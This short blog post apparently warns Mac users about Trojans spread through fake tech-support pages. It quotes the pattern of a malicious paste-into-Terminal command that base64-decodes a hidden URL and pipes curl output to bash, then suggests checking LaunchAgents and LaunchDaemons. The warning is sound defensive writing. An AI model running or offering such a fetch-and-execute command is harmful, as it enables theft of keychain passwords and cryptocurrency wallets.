Some current Trojans disguise themselves as Mac technical support or tutorial websites, often teaching you how to solve common problems and building trust. Finally, they'll give you a command to "copy and paste into Terminal."
Command:
bin/bash -c "$(curl -fsSL $(echo [long_string] | base64 -d))"
When you run this and enter your administrator password, it steals your keychain passwords, memos, and cryptocurrency wallets, compresses them, and uploads them to the attacker's server. This is a targeted theft Trojan.
Thus, don't blindly copy commands from online sources.
Similarly, many cracked plugins for pirated Mac software may hide cracked commands, requiring you to double-click and enter your administrator password. I've had similar experiences before, and I'm unsure if my Mac is infected with viruses.
So, when running commands in Terminal, always check for malicious intent. If you can't see the command code, don't enter your administrator password.
If you're concerned about your computer, you can type
ls /Library/LaunchAgents
or
ls /Library/LaunchDaemons
in Terminal to check for any unidentified daemons. If there are any, back them up first, then delete these daemons, and restart your computer.
PS: Since there are many daemons, it's recommended to organize them into a document and send it to ChatGPT for review.
Reference article
Mac Support, Malware, and Tricks: Trojans are a Trojan Weapon: https://www.mactechnews.de/news/article/Mac-Support-Sucht-Malware-Support-Tricks-are-a-Trojan-weapon-187809.html
Top comments (0)